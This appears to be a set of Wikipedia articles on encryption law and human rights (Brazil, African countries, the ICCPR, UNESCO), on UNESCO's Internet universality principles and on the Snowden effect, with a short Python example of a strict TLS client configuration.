After the Edward Snowden revelations in 2013, Brazil was at the forefront of a global coalition promoting the right to privacy at the UN and condemning US mass surveillance. In recent events, Brazil has demonstrated diverse aims when it comes to the use and implementation of encryption. On the one hand, the country is a leader in providing a legal framework of rules for the Internet; on the other, it has taken several measures that may be seen as restricting the dissemination of encryption technology.

In 2015, in a process open for public comments and discussions, Brazil's legislator drafted a new privacy bill ("proteção de dados pessoais"), which was sent to Brazil's Federal Congress on May 13, 2016 and introduced as Bill 5276 of 2016. It regulates and protects personal data and privacy, including online practices, and includes provisions for more secure methods, such as encryption, in the treatment of personal data. The law also addresses security issues and imposes a duty on companies to report any attacks and security breaches. With the Marco Civil (2014), the Brazilian Civil Rights Framework for the Internet, which introduces principles such as net neutrality, Brazil was one of the first countries to introduce a law aiming to combine all Internet rules in one bundle.

Brazil also has a well-established e-government model: the Brazilian Public Key Infrastructure (Infraestrutura de Chaves Públicas Brasileira, ICP-Brasil). Since 2010, ICP-Brasil certificates can be partly integrated into Brazilian IDs, which can then be used for several services such as the tax revenue service, judicial services or bank-related services. In practice, the ICP-Brasil digital certificate acts as a virtual identity that enables secure and unique identification of the author of a message or transaction made in an electronic medium such as the web.
Brazilian courts have taken a stance against encryption in private messaging services by repeatedly ordering the blocking of the messaging service WhatsApp. Since it switched to full end-to-end encryption, the service has been periodically blocked as a result of court orders in attempts to make the company comply with demands for information.

African countries

The African (Banjul) Charter on Human and Peoples' Rights was adopted in the context of the African Union in 1981. A protocol to the Charter, establishing the African Court on Human and Peoples' Rights, was adopted in 1998 and came into effect in 2005. In the area of information policy, the African Union has adopted the African Union Convention on Cyber Security and Personal Data Protection. The provisions on personal data protection in this Convention generally follow the European model for the protection of data privacy and contain a number of provisions on the security of personal data processing. A civil society initiative has adopted a specific African Declaration on Internet Rights and Freedoms "to help shape approaches to Internet policy-making and governance across the continent".

Northern Africa

The countries of the North African region have not seen a significant rise in legal actions aimed at suppressing encryption in the transformations that started in 2011. Although legislation often dates back to before the transformations, enforcement has since become stricter. No difference in the position towards cryptography can be seen between the countries that had successful revolutions and went through regime changes and those that did not.

Tunisia has several laws that limit online anonymity. Articles 9 and 87 of the 2001 Telecommunication Code ban the use of encryption and provide a sanction of up to five years in prison for the unauthorized sale and use of such techniques.
In Algeria, users have since 2012 legally needed authorization for the use of cryptographic technology from the relevant telecommunications authority, the ARPT (Autorité de Régulation de la Poste et des Télécommunications). In Egypt, Article 64 of the 2003 Telecommunication Regulation Law states that the use of encryption devices is prohibited without the written consent of the NTRA, the military and national security authorities. In Morocco, the import and export of cryptographic technology, be it software or hardware, requires a license from the government; the relevant law, No. 53-05 (Loi n° 53-05 relative à l'échange électronique de données juridiques), went into effect in December 2007.

East Africa

No specific provisions restricting the use of encryption technology are in effect in the countries of the East African region. As in other African countries, the main reason given for state surveillance is the prevention of terrorist attacks. Kenya, with its proximity to Somalia, has cited this threat as grounds for adopting restrictive actions. The country has recently fast-tracked a Computer and Cybercrime Law, expected to be adopted by the end of 2016. In Uganda, a number of laws and ICT policies have been passed over the past three years, but none of them deals with encryption. In 2016, following the presidential elections, the Ugandan government shut down social networks such as Twitter, Facebook and WhatsApp.

West Africa

West African countries limit neither the import nor the export of encryption technology, nor its use; nonetheless, most national and foreign companies still rely on VPNs for their communication. Ghana recently introduced a draft law aimed at intercepting the electronic and postal communications of citizens to aid crime prevention. Section 4(3) of the proposed bill gives the government permission to intercept anyone's communication upon a mere oral order from a public officer.
Recently, the Nigerian Communications Commission drafted a bill on Lawful Interception of Communications Regulations. If passed, the bill would allow the interception of all communication without judicial oversight or court order and would force mobile phone companies to store voice and data communication for three years. Furthermore, the draft would give the National Security Agency the right to request a key to decrypt all encrypted communication.

Southern Africa

Users in South Africa are not prohibited from using encryption. The provision of such technology, however, is strictly regulated by the Electronic Communications and Transactions Act, 2002.

Central Africa

Countries in Central Africa, such as the Democratic Republic of the Congo, the Central African Republic, Gabon and Cameroon, do not yet have a well-developed legal framework addressing Internet policy issues; the Internet remains a relatively unregulated sphere.

Human rights legal framework related to cryptography

International instruments

While digital technologies touch upon a very broad range of human rights, the rights to freedom of expression (Art. 19 of the International Covenant on Civil and Political Rights [ICCPR]) and to private life (Art. 17 ICCPR) are of particular relevance to the protection of cryptographic methods. Unlike the Universal Declaration of Human Rights (UDHR), which is international "soft law", the ICCPR is a legally binding international treaty.

Restrictions on the right to freedom of expression are only permitted under the conditions of Article 19, paragraph 3: they shall be provided for by law and be necessary (a) for respect of the rights or reputations of others or (b) for the protection of national security or of public order or of public health or morals. A further possibility for restriction is set out in Art. 20 ICCPR. In the context of limitations on cryptography, restrictions will most often be based on Article 19(3)(b), i.e.
risks to national security and public order. This raises the complex issue of the relation, and distinction, between the security of the individual, e.g. from interference with personal electronic communications, and national security.

The right to privacy protects against "arbitrary or unlawful interference" with one's privacy, family, home and correspondence. Additionally, Article 17(1) of the ICCPR protects against "unlawful attacks" on one's honor and reputation. The scope of Article 17 is broad. Privacy can be understood as the right to control information about oneself. The possibility to live one's life as one sees fit, within the boundaries set by the law, effectively depends on the information which others have about us and use to inform their behavior towards us; that is part of the core justification for protecting privacy as a human right.

In addition to the duty not to infringe these rights, States have a positive obligation to effectively ensure the enjoyment of freedom of expression and privacy by every individual under their jurisdiction. These rights may conflict with other rights and interests, such as dignity, equality or the life and security of an individual, or with legitimate public interests. In such cases, the integrity of each right or value must be maintained to the maximum extent, and any limitations required for balancing must be provided by law, necessary and proportionate (in particular, least restrictive) in view of a legitimate aim (such as the rights of others, public morals and national security).

Guaranteeing "uninhibited communications"

Encryption supports uninhibited communication by allowing people to protect the integrity, availability and confidentiality of their communications. The requirement of uninhibited communications is an important precondition for the freedom of communication, as acknowledged by constitutional courts, e.g.
the US Supreme Court and the German Bundesverfassungsgericht, as well as the European Court of Human Rights. More specifically, meaningful communication requires people's ability to freely choose the pieces of information, develop their ideas and style of language, and select the medium of communication according to their personal needs. Uninhibited communication is also a precondition for autonomous personal development: human beings develop their personality by communicating with others. The UN's first Special Rapporteur on Privacy, professor Joe Cannataci, stated that "privacy is not just an enabling right as opposed to being an end in itself, but also an essential right which enables the achievement of an over-arching fundamental right to the free, unhindered development of one's personality". Where such communication is inhibited, the interaction is biased, because a statement then reflects not only the speaker's true (innermost) personal views but may be unduly influenced by considerations that should not shape communication in the first place; the process of forming one's personality through social interaction is thereby disrupted.

In a complex society, freedom of speech does not become a reality merely because people have the right to speak. A second level of guarantees is needed to protect the preconditions for making use of the right to express oneself. If there is a risk of surveillance, the right to protect one's freedom of speech by means of encryption has to be considered one of those second-level rights. Restricting the availability and effectiveness of encryption as such therefore constitutes an interference with the freedom of expression and the right to privacy, as encryption protects private life and correspondence; it accordingly has to be assessed in terms of legality, necessity and purpose.

Procedures and transparency

Freedom of expression and the right to privacy (including the right to private communications) materially protect a certain behavior or a personal state.
It is well established in fundamental rights theory that substantive rights have to be complemented by procedural guarantees to be effective. Those procedural guarantees can be rights such as the right to an effective remedy. However, it is important to acknowledge that such procedural rights must, like the substantive rights, be accompanied by specific procedural duties of governments, without which the rights would erode. The substantive rights have to be construed so that they also contain the duty to make governance systems transparent, at least to the extent that allows citizens to assess who made a decision and what measures have been taken. In this respect, transparency ensures accountability: it is the precondition for knowing about the dangers to fundamental rights and for making use of the respective freedoms.

Security intermediaries

The effectuation of human rights protection requires the involvement of service providers, which often act as intermediaries facilitating the expression and communication of their users. In debates about cryptographic policy, the question of lawful government access, and the conditions under which such access should take place in order to respect human rights, tends to have a vertical and national focus. The complexities of jurisdiction in lawful government access are significant and present a still unsolved puzzle. In particular, there has been a dramatic shift from traditional lawful government access to digital communications through the targeting of telecommunications providers with strong local connections, to access through the targeting of over-the-top services with fewer or looser connections to the jurisdictions in which they offer services. It remains contested in which cases such internationally operating service providers should, or should be able to, hand over user data and communications to local authorities. The deployment of encryption by service providers is a further complicating factor.
From the perspective of service providers, it seems likely that cryptographic methods will have to be designed so that user data can be provided only on the basis of valid legal process in certain situations. In recent years, companies, and especially online intermediaries, have found themselves increasingly at the center of the debate on the implementation of human rights. Online intermediaries act not only as intermediaries between content providers and users but also as "security intermediaries" in various respects. Their practices and defaults with regard to encryption are highly relevant to users' access to and effective usage of those technologies. Since a great amount of data travels through their routers and is stored in their clouds, they offer ideal points of access for the intelligence community and for non-state actors. Thus they also, perhaps involuntarily, function as an interface between the state and users in matters of encryption policy. This role has to be reflected in the human rights debate as well, and it calls for a comprehensive integration of the security of user information and communication into the emerging Internet governance model of today.

Internet universality

Human rights and encryption: obligations and room for action

UNESCO is working to promote the use of human-rights-based legal assessments in cases of interference with the freedom to use and deploy cryptographic methods. The concept of Internet Universality, developed by UNESCO, emphasizes openness, accessibility to all, and multi-stakeholder participation. While minimal requirements and good practices can be based on more abstract legal analysis, such assessments have to be made in specific contexts. Secure authenticated access to publicly available content, for instance, is a safeguard against many forms of public and private censorship and limits the risk of falsification.
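One way such secure authenticated access is realized in practice is a strictly configured TLS client; a minimal sketch using Python's standard ssl module (the commented-out host name is a placeholder):

```python
import ssl

# A strict client-side TLS context: certificate validation plus hostname
# checking are what make the access *authenticated* -- the client can be
# confident it reached the site it asked for, and the channel is encrypted.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse legacy protocols

assert context.verify_mode == ssl.CERT_REQUIRED
assert context.check_hostname is True

# The context would then wrap a TCP socket, e.g.:
#   with socket.create_connection(("example.org", 443)) as sock:
#       with context.wrap_socket(sock, server_hostname="example.org") as tls:
#           ...  # certificate and hostname are verified during the handshake
print("certificate verification enforced")
```

A connection that fails certificate or hostname verification is refused, which is precisely the property that protects readers against impersonation and content falsification.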
One of the most prevalent technical standards that enables secure authenticated access is TLS. Closely related to this is the availability of anonymous access to information. Tor is a system that allows the practically anonymous retrieval of information online. Both aspects of access to content directly benefit the freedom of thought and expression. The principle of legal certainty is vital to every juridical process that concerns cryptographic methods or practices. The principle is essential to any form of interception and surveillance, because it can prevent unreasonable fears of surveillance, provided that the underlying legal norms are drafted precisely. For UNESCO, legal certainty may avert chilling effects by reducing a key inhibiting factor for the exercise of human rights. Continuous innovation in the field of cryptography and the setting and spreading of new technical standards is therefore essential. Cryptographic standards can expire quickly as computing power increases. UNESCO has outlined that education and continuous modernization of cryptographic techniques are important.

Human rights and cryptographic techniques

Legality of limitations

The impact on human rights can only be assessed by analyzing the possible limitations that states can set for those freedoms. UNESCO states that national security can be a legitimate aim for actions that limit freedom of speech and the right to privacy, but it calls for actions that are necessary and proportional. "UNESCO considers an interference with the right to encryption as a guarantee enshrined in the freedom of expression and in privacy as being especially severe if:
• It affects the ability of key service providers in the media and communications landscape to protect their users' information and communication through secure cryptographic methods and protocols, thereby constituting the requirement of uninhibited communications for users of networked communication services and technologies.
• The state reduces the possibility of vulnerable communities and/or structurally important actors like journalists to get access to encryption;
• Mere theoretical risks and dangers drive restrictions to the relevant fundamental rights under the legal system of a state;
• The mode of state action, e.g. if restrictions on fundamental rights are established through informal and voluntary arrangements, leads to unaccountable circumvention or erosion of the security of deployed cryptographic methods and technologies."

Sources See also Free speech References Cryptography Human rights Freedom of speech Privacy Internet governance Encryption debate
55639999
https://en.wikipedia.org/wiki/Internet%20universality
Internet universality
Internet universality is a concept and framework adopted by UNESCO in 2015 to summarize its positions on the Internet. The concept recognizes that "the Internet is much more than infrastructure and applications, it is a network of economic and social interactions and relationships, which has the potential to enable human rights, empower individuals and communities, and facilitate sustainable development. The concept is based on four principles stressing the Internet should be Human rights-based, Open, Accessible, and based on Multistakeholder participation. These have been abbreviated as the R-O-A-M principles. Understanding the Internet in this way helps to draw together different facets of Internet development, concerned with technology and public policy, rights and development." Through the concept of Internet universality, UNESCO highlights four separate but interdependent fields of Internet policy and practice that are considered "key" to assessing a better Internet environment: access to information and knowledge, freedom of expression, privacy, and ethical norms and behavior online. A framework named ROAM was developed by UNESCO in order to investigate and evaluate the universality of the Internet in different countries. The framework is based on four normative principles agreed by UNESCO Member States: human rights, openness, accessibility and multistakeholder participation, summarised in the acronym R-O-A-M. These principles represent a solid ground for UNESCO to create a tool to comprehend Internet governance: the Internet Universality indicators.

History

The term was agreed on by UNESCO's General Conference in 2015 as a means to integrate UNESCO's work in the framework of the World Summit on the Information Society (WSIS). It is part of UNESCO's project to fulfill the 2030 Agenda for Sustainable Development. During the 37th session of the General Conference, UNESCO Member States affirmed the principle of the applicability of human rights in cyberspace.
The concept of Internet universality was then built upon the ‘CONNECTing the dots’ conference outcome document of 3–4 March 2015. UNESCO's Deputy Director General, Mr. Getachew Engida, in closing the ‘CONNECTing the dots’ conference, stated: "The Internet and all new information and communication technologies must be at the heart of the post-2015 sustainable development agenda - as a transformational force and a foundation for building the knowledge societies we need."

Wider context

The social, civic and economic potential of a global Internet — one that bridges the world — is widely recognized. Connecting an individual, locality, nation or continent to the wealth of information, expertise and communities distributed across the globe is among the greatest promises of the Internet; for example, educational materials can now readily be put in the hands of students worldwide. Moreover, the Internet can empower users to create, disseminate, and consume information and knowledge resources. This potential for using the Internet to reconfigure access to information and knowledge, and also to reshape freedom of expression, privacy, and ethical norms and behavior, has been a theme in academic research. The Internet is understood here to include the interconnected information and communication technologies, such as the Web, social media, the developing mobile Internet, and the Internet of Things (IoT), including such developments as cloud computing, big data, and robotics, that are increasingly central to networked technologies. Biometrics and other technologies central to developing network applications, such as for personal identification and security, are also incorporated in this definition. By 2014, over three billion people had gained access to the Internet from around the world. This is a major advance in worldwide access to information and knowledge, but translates to only 42 per cent of the world's population, leaving most of the world without access.
Even those with access are often constrained by technical barriers, language barriers, skills deficits and many other social and policy factors from accessing information and knowledge in essential ways. The global diffusion of the Internet is progressing, but at the same time what we know as the Internet is continually changing. Innovation continues apace in many areas, from mobile applications and payment systems to social media and information and communication technologies (ICT). The Internet has reached more people in more powerful ways than ever thought possible. It has also become a major resource for economic development.

Internet Universality Principles: R-O-A-M

The R-O-A-M principles are a theoretical framework for assessing the state of play of each of the key fields of Internet policy. The framework underscores a set of principles that, when applied to the Internet, aim to achieve an open, global and secure Internet, by highlighting the relevance of human rights as a whole, as well as openness, accessibility and multistakeholder participation.

Rights-based

The Internet is becoming so significant in everyday life, work and identity in much of the world that it is increasingly difficult to distinguish human rights on and off the Internet. UNESCO and the United Nations more broadly have affirmed the principle that human rights should apply to all aspects of the Internet. This would include, for example, freedom of expression and privacy. UNESCO considers that, as these two rights apply to the Internet, so should other rights, such as cultural diversity, gender equality, and education. As human rights are indivisible, for UNESCO all the rights mentioned above also need to be balanced with rights that apply to both digital and extra-digital life.

Openness

This general principle, applied to the Internet, encompasses open global standards, interoperability, open application interfaces, and open science, documents, text, data, and flows.
Social and political support for open systems, not only technical expertise, is part of this principle. Transparency is part of openness, as well as a dimension of the rights to seek and receive information. Rights and openness are thus interdependent.

Accessibility

The broader principle of social inclusion has special relevance to the Internet. It puts forward the role of accessibility in overcoming digital divides, digital inequalities, and exclusions based on skills, literacy, language, gender or disability. It also points to the need for sustainable business models for Internet activity, and to trust in the preservation, quality, integrity, security, and authenticity of information and knowledge. Accessibility is interlinked with rights and openness.

Multistakeholder participation

The general principle of participation in decision-making that impacts the lives of individuals has been part of the Internet from its outset, accounting for much of its success. It recognizes the value of multistakeholder participation, incorporating users and a user-centric perspective as well as all other actors critical to developing, using and governing the Internet across a range of levels. The other principles are enriched by the multistakeholder participation principle, because it states that everyone should have a stake in the future of the Internet. It is possible to define a number of broad categories of stakeholders in the Internet, with subgroups as well: the state, businesses and industries, non-governmental actors, civil society, international governmental organizations, research actors, individuals, and others. Each of these categories has more or less unique stakes in the future of the Internet, but there are also areas of great overlap and interdependence. For instance, some NGOs are likely to prioritize the promotion of human rights, while parliaments are primary actors in defining laws to protect these rights.
Still other stakeholders are key to shaping rights online, such as search engine providers and Internet service providers (ISPs). Individuals also have particular roles to play in respecting, promoting and protecting rights.

Cross-cutting factors

Aside from the four main factors (R-O-A-M), UNESCO has also identified five cross-cutting factors that apply across all of the R-O-A-M categories and should be taken into consideration. Of the five, two are concerned with gender and age equality, one is concerned with sustainable development (i.e. what part the Internet plays in achieving the Sustainable Development Goals developed by the UN), the fourth is concerned with Internet trust and security, and the last is concerned with legal and ethical properties of the Internet.

Internet Universality Indicators

UNESCO is now developing Internet Universality indicators - based on the ROAM principles - to help governments and other stakeholders assess their own national Internet environments and to promote the values associated with Internet universality. The research process was envisioned to include consultations at a range of global forums and a written questionnaire sent to key actors, but also a series of publications on important Internet freedom-related issues such as encryption, hate speech online, privacy, digital safety and journalism sources. The outcome of this multidimensional research will be published in June 2018. The final indicators will be submitted to the UNESCO Member States in the International Programme for the Development of Communication (IPDC) for endorsement. The indicators are divided into three different groups: quantitative indicators, qualitative indicators and institutional indicators (which concern constitutional and legal arrangements). This has raised questions about the credibility of the indicators, as well as the difficulty of actually carrying out the research.
Due to differences in data availability, it could be difficult to give a fair assessment of all indicators for all countries involved. However, in its draft UNESCO states that the range and diversity of indicators included in the framework should enable them to provide sufficient evidence of the Internet environment as a whole. Other challenges include differing definitions of terms like 'broadband', as well as the fact that much of the relevant data is held by private companies and is not publicly available as a result.

The Four Major Fields of Focus

Access to Information and Knowledge

Access to information and knowledge encompasses the vision of universal access, not only to the Internet, but also to the ability to seek and receive open scientific, indigenous, and traditional knowledge online, and to produce content in all forms. This requires initiatives for freedom of information and the building of open and preserved knowledge resources, as well as respect for cultural and linguistic diversity that fosters local content in multiple languages, quality educational opportunities for all, including new media literacy and skills, and social inclusion online, including addressing inequalities based on income, skills, education, gender, age, race, ethnicity, or accessibility by those with disabilities.

Freedom of Expression

Freedom of expression entails the ability to safely express one's views over the Internet, ranging from the rights of Internet users to freedom of expression online, through to press freedom and the safety of journalists, bloggers and human rights advocates, along with policies that enhance an open exchange of views and a respect for the rights of free online expression.

Privacy

Privacy refers broadly to Internet practices and policies that respect the rights of individuals to have a reasonable expectation of having a personal space, and to control access to their personal information. Privacy, therefore, allows individuals to freely express their ideas without fear of reprisals. Privacy protection is, however, a tricky concept that goes together with the promotion of openness and transparency, and with a recognition that privacy and its protection underpin freedom of expression and trust in the Internet, and therefore its greater use for social and economic development.

Ethics

Ethics considers whether the norms, rules and procedures that govern online behavior and the design of the Internet and related digital media are based on ethical principles anchored in human rights, geared to protecting the dignity and safety of individuals in cyberspace, and advancing accessibility, openness, and inclusiveness on the Internet. For example, Internet use should be sensitive to ethical considerations, such as non-discrimination on the basis of gender, age or disabilities; and it should be shaped by ethics rather than used to retrospectively justify practices and policies, placing a focus on the intentionality of actions as well as on the outcomes of Internet policies and practices.

Challenges to Internet Universality

As the World Wide Web and related digital media have evolved, they have come to serve many diverse purposes for many different actors, e.g. household entertainment and government surveillance. Technical innovations are altering traditional business models, such as in the provision of news, and the structure of organizations, where traditional hierarchical reporting relationships have been challenged by many-to-one and many-to-many networks of communication that span organizational boundaries.

Policy

As digital media have been a force behind the convergence of formerly more distinct technologies of the post, telephone, and mass media, policy and regulation have often failed to keep up, as can be seen in the lack of a clear and unified regulatory approach to social media.
This has left potentially inappropriate regulations in place and failed to integrate new solutions such as media and information literacy. A worldwide ecology of policies and regulations is shaping the interrelated local and global outcomes of the Internet on access to information and knowledge, freedom of expression, privacy and ethics. Such policy choices are being considered by a multiplicity of actors at all levels, for all are concerned that the policies and practices governing the Internet could undermine principles and purposes they view as fundamental, whether those values are centered on freedom of expression, the privacy of personal information, or ethical conduct, and whether the implications are perceived to be immediate or long term.

Blocking, Filtering and Content Regulation

Blocking and filtering of content are common areas of concern for NGOs and international organizations such as UNESCO. These measures directly restrict citizens' rights to impart information and opinion, as well as adversely affecting their rights to access online content. In many cases, users might not realize that content has been filtered or blocked. There has been some recognition that, alongside censorship as a violation of free expression, there is also legitimate reason in some contexts to block certain content, such as material that incites violence. This raises the question of how to draw the line in specific cases about what to block, for how long, in what proportion, and with what transparency and redress mechanisms. Another issue is the danger of holding intermediaries liable as if they were publishers — for example, making social media platforms responsible for an alleged case of hate speech.
International standards of human rights law mean that removal, blockage or filtering of Internet content should be the exception to the norm of free flow of information, and that such actions should fulfill the conditions of due purpose, necessity, proportionality, and transparency, and be authorized under relevant law and policy. Furthermore, multiple actors, including individual users, can identify instances of censorship and expose these cases to the court of public opinion. In such ways, the Internet has the potential to enable individual Internet users to hold institutions and other users more accountable for their actions online, creating what has been called a ‘Fifth Estate’, analogous to the Fourth Estate of the press, but potentially even more powerful. A Fifth Estate does, however, require a relatively free and open Internet to be sustainable and influential.

User Targeting and Profiling

Governments or commercial enterprises have the ability to target individual users, putting their privacy in danger, given that they will know much about users' interests through their search or other online activities. Individual users of social media platforms can advertise to others who are interested in particular topics. This can appear more as a violation of privacy than the exercise of free speech. A related issue is the ‘filter bubble’: the idea that different Internet users will see different versions of the Internet, based on how algorithms use their previous search or social media preferences. User targeting can happen at the level of the government, private companies, or even at the infrastructural level.

Expression and Identification

Freedom of expression depends on related issues of privacy, anonymity, and encryption, which face an apparent resistance to change.

Anonymity

Anonymity can be a cornerstone of privacy; it is considered a prerequisite for the expression of unpopular or critical speech.
Anonymity is sometimes viewed as contributing to harmful speech, such as hate speech, which goes beyond international standards of human rights law for protected speech. Despite this perception, academic research has not established that removing anonymity and requiring the identification of speakers would be a cure for insensitive or hurtful remarks. These incivilities are often fostered by a larger set of circumstances, such as the failure of users sitting at a computer to fully realize that they are communicating with a real person. Anonymity may also impact public debate online. In some countries, participants would refrain from taking part in discussions (for instance on the issue of gay rights or domestic abuse) for fear of identification and persecution. Anonymity in cyber-attacks, including fake domain attacks impersonating civil society, is a serious violation of free expression.

Data protection and surveillance

Data protection can be critical to free expression. Increasing government surveillance of citizens, including through the collection and analysis of ‘big data’, is leading to an erosion of citizens' rights to privacy and freedom of expression. A report of the former UN Special Rapporteur on Freedom of Opinion and Expression states that bulk access to all digital communications traffic eradicates the possibility of individualized proportionality analysis, because it pre-empts prior authorization based on specific targeted suspicion. The potential of mass surveillance and the use of big data analytics could change the balance between the state and individuals. Whistleblowers such as Edward Snowden helped identify the mass surveillance of communications metadata as a disproportionate response in relation to the security problem.
Concerns were also expressed during the ‘CONNECTing the dots’ conference about surveillance tools, originally built to address severe crimes, being used to collect personal information about dissidents, or sometimes about all citizens. Further concerns related to weak transparency about how data is collected or used for security investigations. Manipulation of security practices, such as the introduction of ‘back doors’ into software to allow legitimate government access, can leave Internet users vulnerable to other, illegitimate threats. Attackers can potentially get in through the same back doors, rendering systems less secure.

Jurisdictional Issues

There are a number of obstacles to maintaining and promoting the right to freedom of expression via regulation and regulatory frameworks. Due to its globalized and borderless nature, the Internet can be seen as inherently difficult to regulate. There is, for example, a difficulty in establishing effective state-based regulation in a world where content can be hosted in and accessed from entirely different countries, leading to regulation becoming obsolete. Striking the correct regulatory balance is difficult, as over-regulation or inappropriate regulation can have negative consequences not only for freedom of expression but for the value of the Internet in general. UNESCO considers that governments' role is not to restrict freedoms, but rather to ensure that fundamental human rights — including communication-related rights — are protected. Paradoxically, a lack of regulation could be a detriment to the public interest. Internet-specific laws to protect freedom of expression could then be justified, since the Internet is so different from any of the traditional media. Sources Notes References Freedom of speech Privacy Internet governance
55660110
https://en.wikipedia.org/wiki/Snowden%20effect
Snowden effect
The Snowden effect is part of the reactions to global surveillance disclosures made by Edward Snowden. His disclosures have fueled debates over mass surveillance, government secrecy, and the balance between national security and information privacy, and have resulted in notable impacts on society and the tech industry, and served as the impetus for new products that address privacy concerns such as encryption services. Collectively, these impacts have been referred to by media and others as the "Snowden effect".

On society

In July 2013, media critic Jay Rosen defined the Snowden effect as "Direct and indirect gains in public knowledge from the cascade of events and further reporting that followed Edward Snowden's leaks of classified information about the surveillance state in the U.S." In December 2013, The Nation wrote that Snowden had sparked an overdue debate about national security and individual privacy. At the 2014 World Economic Forum, Internet experts saw news that Microsoft would let foreign customers store their personal data on servers outside America as a sign that Snowden's leaks were leading countries and companies to erect borders in cyberspace. In Forbes, the effect was seen to have nearly united the U.S. Congress in opposition to the massive post-9/11 domestic intelligence gathering system. In its Spring 2014 Global Attitudes Survey, the Pew Research Center found that Snowden's disclosures had tarnished the image of the United States, especially in Europe and Latin America. In May 2014, the Obama administration appointed William Evanina, a former FBI special agent with a counter-terrorism specialty, as the new government-wide National Counterintelligence Executive. "Instead of getting carried away with the concept of leakers as heroes," Evanina said in August, "we need to get back to the basics of what it means to be loyal. Undifferentiated, unauthorized leaking is a criminal act."
While dealing with insider threats had been an intelligence community priority since WikiLeaks published Chelsea Manning's disclosures in 2010, Evanina said that in the aftermath of Snowden's June 2013 revelations, the process "sped up from a regional railway to the Acela train." A year later, 100,000 fewer people had security clearances. In September 2014, Director of National Intelligence James Clapper said Snowden's leaks created a perfect storm, degrading the intelligence community's capabilities. Snowden's leaks, said Clapper, damaged relationships with foreign and corporate stakeholders, restrained budget resources, and caused the U.S. to discontinue collecting intelligence on certain targets, putting the United States at greater risk. In October 2014, former Director of the National Counterterrorism Center Matthew G. Olsen told CNN that Snowden's disclosures had made it easier for terrorist groups to evade U.S. surveillance by changing their encryption methods. Olsen said intelligence collection against some individuals of concern had been lost, preventing insight into their activities. By July 2015 ISIL had studied Snowden's disclosures and, said U.S. officials, its leaders were using couriers or encrypted communications that Western analysts could not crack. In February 2015, National Counterterrorism Center director Nicholas Rasmussen told Congress that Snowden's disclosures had damaged U.S. intelligence capabilities. Rasmussen said the government knew of specific terrorists who, after learning from Snowden's leaks how the U.S. collected intelligence, had increased their security measures by using new types of encryption, changing email addresses, or abandoning prior methods of communicating. Reflecting on the effect of his leaks, Snowden himself wrote in February 2015 that "the biggest change has been in awareness. 
Before 2013, if you said the NSA was making records of everybody's phone calls and the GCHQ was monitoring lawyers and journalists, people raised eyebrows and called you a conspiracy theorist. Those days are over." In March 2015, USA Today reported that the Snowden effect had hit The Guardian. Journalist Michael Wolff, who wrote for The Guardian for many years, asserted that the recent selection of Katharine Viner as editor-in-chief "can be read as, in part, a deeply equivocal response on the part of the paper's staff, with its unusual power in the process of selecting a new editor, to the Snowden story." According to Wolff, there had developed "a sense of journalistic queasiness around Snowden, difficult to express at the party-line Guardian. Questioning Snowden's retreat to Russia and his protection by Vladimir Putin was internally verboten."

Technology industry

In the technology industry, the Snowden effect had a profound impact after it was revealed that the NSA was tapping into the information held by some U.S. cloud-based services. Google, Cisco, and AT&T lost business internationally due to the public outcry over their roles in NSA spying. A study by the Information Technology and Innovation Foundation published in August 2013 estimated that the cloud-based computing industry could lose up to $35 billion by 2016. The Wall Street Journal named "the Snowden effect" as 2013's top tech story, saying Snowden's leaks "taught businesses that the convenience of the cloud cuts both ways." The Journal predicted the effect would top 2014 news as well, given the number of documents yet to be revealed. In China, the most profitable country for U.S. tech companies, all are "under suspicion as either witting or unwitting collaborators" in the NSA spying, according to the director of the Research Center for Chinese Politics and Business at Indiana University.
The effect was also seen in changes to investment in the industry, with security "back on the map" according to Hussein Kanji, venture capitalist at Hoxton Ventures. On August 8, 2013, Lavabit, a secure email provider that Snowden used, discontinued service after being asked for encryption keys that would have exposed to U.S. government prosecutors the emails of all 410,000 Lavabit users. The next day, a similar provider called Silent Circle announced that it too would shut down because it was not possible to sufficiently secure email. In October 2013, the two companies joined forces and announced a new email service, Dark Mail Alliance, designed to withstand government surveillance. After revelations that German Chancellor Angela Merkel's mobile was being tapped, the tech industry rushed to create a secure cell phone. According to TechRepublic, revelations from the NSA leaks "rocked the IT world" and had a "chilling effect". The three biggest impacts were seen as increased interest in encryption, business leaving U.S. companies, and a reconsideration of the safety of cloud technology. The Blackphone, which The New Yorker called "a phone for the age of Snowden" and which was described as "a smartphone explicitly designed for security and privacy", was created by the makers of GeeksPhone, Silent Circle, and PGP, and provided encryption for phone calls, emails, texts, and Internet browsing. Since Snowden's disclosures, Americans used the Internet less for things like email, online shopping and banking, according to an April 2014 poll. Also in April 2014, former NSA deputy director Col. Cedric Leighton told the Bloomberg Enterprise Technology Summit in New York City that Snowden's leaks had done a significant disservice to the worldwide health of the Internet by leading Brazil and other countries to reconsider the Internet's decentralized nature.
Leighton suggested that nation-states' efforts to create their own versions of the Internet were the beginning of the end for the Internet as we know it. "When you have a situation where all of a sudden, everyone goes into 'tribal' mode—a German cloud, a Swiss cloud, or any other separate Internet—they are significant nationalistic attempts," said Leighton. "What happened with Snowden, it's more of an excuse than a policy, it's more of an excuse to re-nationalize the Internet." In March 2014, The New York Times reported that economic fallout from Snowden's leaks had been a boon for foreign companies, to the detriment of U.S. firms. Daniel Castro, a senior analyst at the Information Technology and Innovation Foundation, predicted that the United States cloud computing industry could lose $35 billion by 2016. Matthias Kunisch, a German software executive who switched from U.S. cloud computing providers to Deutsche Telekom, said that due to Snowden his customers thought American companies had connections to the NSA. Security analysts estimated that U.S. tech companies had, since Snowden, collectively spent millions and possibly billions of dollars adding state-of-the-art encryption features to consumer services and to the cables that link data centers. In July 2014, the nonpartisan New America Foundation summarized the impact of Snowden's revelations on U.S. businesses. The erosion of trust, said the report, has had serious consequences for U.S. tech firms. IT executives in France, Hong Kong, Germany, the UK, and the U.S. confirmed that Snowden's leaks directly impacted how companies around the world think about information and communication technologies, particularly cloud computing. A quarter of British and Canadian multinational companies surveyed were moving their data outside the U.S. Among the U.S. companies attributing drops in revenue in part to the fallout from Snowden's leaks were Cisco Systems, Qualcomm, IBM, Microsoft, and Hewlett-Packard.
